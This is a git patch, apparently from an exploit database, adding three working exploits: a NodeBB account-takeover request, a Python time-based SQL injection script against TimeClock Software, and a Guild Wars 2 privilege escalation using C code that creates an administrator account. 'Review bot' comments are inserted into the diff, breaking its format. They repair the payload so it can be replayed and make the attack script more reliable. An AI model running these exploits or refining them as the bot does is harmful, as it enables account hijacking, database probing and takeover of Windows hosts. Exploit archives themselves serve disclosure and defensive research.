From a3aad6c41a91dfebf31aa4f572c50d82e7c8a783 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 15 Oct 2020 05:02:06 +0000
Subject: [PATCH] DB: 2020-10-15

3 changes to exploits/shellcodes

Guild Wars 2 - Insecure Folder Permissions
TimeClock Software 0.995 - Multiple SQL Injections
TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections
TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection
NodeBB Forum 1.12.2-1.14.2 - Account Takeover
---
 exploits/multiple/webapps/48875.txt | 21 ++++++
 exploits/php/webapps/48874.py | 50 +++++++++++++
 exploits/windows/local/48876.txt | 107 ++++++++++++++++++++++++++++
 files_exploits.csv | 5 +-
 4 files changed, 182 insertions(+), 1 deletion(-)
 create mode 100644 exploits/multiple/webapps/48875.txt
 create mode 100755 exploits/php/webapps/48874.py
 create mode 100644 exploits/windows/local/48876.txt

diff --git a/exploits/multiple/webapps/48875.txt b/exploits/multiple/webapps/48875.txt
new file mode 100644
index 000000000..1d6455004
--- /dev/null
+++ b/exploits/multiple/webapps/48875.txt
@@ -0,0 +1,21 @@
+# Exploit Title: NodeBB Forum 1.12.2-1.14.2 - Account Takeover
+# Date: 2020-08-18
+# Exploit Author: Muhammed Eren Uygun
+# Vendor Homepage: https://nodebb.org/
+# Software Link: https://github.com/NodeBB/NodeBB
+# Version: 1.12.2-1.14.2
+# Tested on: Linux
+# CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7
+Impact:
+----------------------
+A bug in this validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to a privilege escalation event due via an account takeover.
+
+Bug PoC:
+----------------------
+Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4
+1- Create a user
+2- Go to password change page
+3- Change password with proxy
+427["user.changePassword",("currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5)])
+4- Replace the uid on the request with 1, which is the uid value of the admin user, and send the request.
+5- So you can login with this password to admin user.
\ No newline at end of file
diff --git a/exploits/php/webapps/48874.py b/exploits/php/webapps/48874.py
new file mode 100755
index 000000000..997912326
--- /dev/null
+++ b/exploits/php/webapps/48874.py
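Review bot: The socket.io frame quoted after step 3 is not replayable as written: the event argument is wrapped in parentheses and there is an unbalanced trailing `)`, whereas socket.io carries the argument as a JSON object, so the line should read `427["user.changePassword",{"currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5}]` (the leading `42` is presumably the engine.io/socket.io event prefix and `7` a per-session ack id, so those digits will differ when replayed). The text also only implies, via "with proxy", that the request must be sent over the authenticated low-privilege user's existing websocket session; saying so explicitly would save a reader from trying it as a plain HTTP POST. The header lists only the affected range, so a reader has to follow the GHSA link on the CVE line to learn which release carries the fix; a one-line "Fixed in:" note would help.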
@@ -0,0 +1,50 @@
+#!/usr/bin/python3
+
+# Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection
+# Date: July 21, 2020
+# Exploit Author: François Bibeau
+# Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90
+# Vendor Homepage: http://timeclock-software.net/
+# Software Link: http://timeclock-software.net/timeclock-download.php
+# Version: 1.01
+# Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache
+
+import time
+import requests
+
+
+login_url = 'http://159.203.41.34/login_action.php' # Ensure to change ip to match target
+login_data = {'username':'fred','password':'fred','submit':'Log In'}
+headers = {'User-Agent': 'Mozilla/5.0'}
+
+# init session & login
+session = requests.Session()
+session.post(login_url,headers=headers,data=login_data)
+
+# static list provided for PoC, could use a text file
+users = ['john','bill','tim','fred','garry','sid','admin']
+
+for user in users:
+ url = "http://159.203.41.34/add_entry.php"
+ payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='"
+
+ data = {'data_month': '1',
+ 'data_day': '1',
+ 'data_year': '1',
+ 'type_id': '5',
+ 'hours': '1',
+ 'notes': payload,
+ 'submit': 'Add'}
+
+ print(f'Checking user {user}... ', end = '')
+
+ start = time.time()
+ response = session.post(url,data=data)
+ end = time.time()
+
+ delay = end - start
+
+ if delay > 5:
+ print('User found!')
+ else:
+ print('')
\ No newline at end of file
diff --git a/exploits/windows/local/48876.txt b/exploits/windows/local/48876.txt
new file mode 100644
index 000000000..154ea352d
--- /dev/null
+++ b/exploits/windows/local/48876.txt
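Review bot: The login POST's result is thrown away, so a wrong host, password or changed form field silently turns every probe into "not found" with no indication that the session was never authenticated, and neither `session.post` call passes `timeout=`, so a hung target blocks the script forever (a SLEEP-based probe makes that more likely). The hunk does not show what `login_action.php` returns on a failed login, so the exact success check needs confirming against the application; at minimum fail on a non-2xx status, and keep the host in one variable instead of repeating the IP in `login_url` and `url`. `response` is assigned and never read, and the `delay > 5` threshold sits exactly on the `SLEEP(5)` value, so a slow but un-injected request could be reported as a hit; a small margin would be safer. Something like:
```python
target = 'http://159.203.41.34'  # change to match target
login_url = f'{target}/login_action.php'
# … unchanged: login_data, headers …
session = requests.Session()
login = session.post(login_url, headers=headers, data=login_data, timeout=15)
login.raise_for_status()  # TODO confirm how login_action.php signals a rejected login
# … unchanged: users list …
for user in users:
    url = f'{target}/add_entry.php'
    # … unchanged: payload, data, print …
    start = time.time()
    session.post(url, data=data, timeout=30)
    delay = time.time() - start
```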
@@ -0,0 +1,107 @@
+# Exploit Title: Guild Wars 2 - Insecure Folder Permissions
+# Date: 2020-10-09
+# Exploit Author: George Tsimpidas
+# Software Link : https://account.arena.net/welcome
+# Version Build : 106915
+# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
+# Category: local
+
+
+
+Vulnerability Description:
+
+Guild Wars 2 Launcher (Gw2-64.exe) suffers from an elevation of privileges
+vulnerability which can be used by a simple user that can change the
+executable file
+with a binary of choice. The vulnerability exist due to the improper
+permissions,
+with the 'F' flag (Full) for 'Everyone' group, making the entire directory
+'Guild Wars 2' and its files and sub-dirs world-writable.
+
+
+# Local Privilege Escalation Proof of Concept
+
+
+D:\icacls "Guild Wars 2"
+Guild Wars 2 Everyone:(F)
+Everyone:(OI)(CI)(IO)(M,WDAC,WO,DC)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+NT AUTHORITY\Authenticated Users:(I)(M)
+NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
+BUILTIN\Users:(I)(RX)
+BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+
+## Insecure File Permission
+
+D:\Guild Wars 2icacls Gw2-64.exe
+Gw2-64.exe Everyone:(F)
+Everyone:(I)(F)
+BUILTIN\Administrators:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT AUTHORITY\Authenticated Users:(I)(M)
+BUILTIN\Users:(I)(RX)
+
+
+
+#0. Download & install
+
+#1. Create low privileged user & change to the user
+## As admin
+
+C:\net user lowpriv Password123! /add
+C:\net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
+User name lowpriv
+Local Group Memberships *Users
+Global Group memberships *None
+
+#2. Move the Service EXE to a new name
+
+D:\Guild Wars 2whoami
+lowpriv
+
+D:\Guild Wars 2move Gw2-64.exe Gw2-64.frey.exe
+1 file(s) moved.
+
+#3. Create malicious binary on kali linux
+## Add Admin User C Code
+
+kali# cat addAdmin.c
+int main(void){
+system("net user placebo mypassword /add");
+system("net localgroup Administrators placebo /add");
+WinExec("D:\\Guild Wars 2\\Gw2-64.frey.exe",0);
+return 0;
+}
+
+## Compile Code
+kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Gw2-64.exe
+
+#4. Transfer created 'Gw2-64' to the Windows Host
+
+#5. Move the created 'Gw2-64' binary to the 'D:\Guild Wars 2' Folder
+
+D:\Guild Wars 2move C:\Users\lowpriv\Downloads\Gw2-64.exe .
+
+#6. Check that exploit admin user doesn't exists
+
+D:\Guild Wars 2net user placebo
+
+The user name could not be found
+
+#6. Reboot the Computer
+
+D:\Guild Wars 2shutdown /r
+
+#7. Login & now start the Guild Wars 2 Game, back doored launcher will be
+executed, and the user placebo will be created, and added to the
+Administrators group.
+
+C:\Users\lowprivnet user placebo | findstr /i "Membership Name" | findstr
+/v "Full"
+
+User name placebo
+Local Group Memberships *Administrators *Users
+Global Group memberships *None
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e1832f202..0a0108017 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
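Review bot: Step 7 never says which account has to start the game, yet the payload's `net user placebo ... /add` and `net localgroup Administrators placebo /add` only succeed when the replaced launcher runs under an administrator (or elevated) token; launched by lowpriv they simply fail, so the reboot at the second "#6" is not what escalates and the chain is really "plant the binary, wait for a privileged user to run it". A sentence such as `#7. As an administrator (or any account that launches the game elevated), log in and start Guild Wars 2 ...` would make the precondition explicit and the severity easier to judge. The C snippet has no `#include <stdlib.h>` / `#include <windows.h>`, so `system` and `WinExec` are implicitly declared (a warning with the mingw-w64 gcc used here, a hard error with recent gcc), and `-l ws2_32` links a library the code never uses. Two consecutive steps are both numbered #6.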
@@ -10388,6 +10388,7 @@ id,file,description,date,author,type,platform,port
 48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows,
 48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
 48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows,
+48876,exploits/windows/local/48876.txt,"Guild Wars 2 - Insecure Folder Permissions",2020-10-14,"George Tsimpidas",local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -38881,7 +38882,7 @@ id,file,description,date,author,type,platform,port
 39394,exploits/multiple/webapps/39394.txt,"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation",2016-02-01,GraphX,webapps,multiple,80
 39399,exploits/multiple/webapps/39399.txt,"Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery",2016-02-02,"Kaustubh G. Padwad",webapps,multiple,
 39402,exploits/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",webapps,jsp,80
-39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80
+39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80
 39405,exploits/jsp/webapps/39405.py,"Jive Forums 5.5.25 - Directory Traversal",2016-02-03,ZhaoHuAn,webapps,jsp,80
 39407,exploits/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting",2016-02-03,Portcullis,webapps,hardware,
 39408,exploits/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware,
@@ -40692,6 +40693,8 @@ id,file,description,date,author,type,platform,port
 48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php,
 48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware,
 48872,exploits/php/webapps/48872.txt,"berliCRM 1.0.24 - 'src_record' SQL Injection",2020-10-13,"Ahmet Ümit BAYRAM",webapps,php,
+48874,exploits/php/webapps/48874.py,"TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection",2020-07-23,"François Bibeau",webapps,php,
+48875,exploits/multiple/webapps/48875.txt,"NodeBB Forum 1.12.2-1.14.2 - Account Takeover",2020-10-14,"Muhammed Eren Uygun",webapps,multiple,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
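Review bot: The new 48874 row carries a stray ` 0` after the version, `TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection`, which disagrees with the `# Version: 1.01` header in exploits/php/webapps/48874.py and will propagate into search results and the commit subject; the description should read `TimeClock Software 1.01 - (Authenticated) Time-Based SQL Injection`. The 39404 rename elsewhere in this commit has a similar slip, `(Authenticated )` with a space before the closing parenthesis, and the two look like they were typed by hand rather than generated from the file headers.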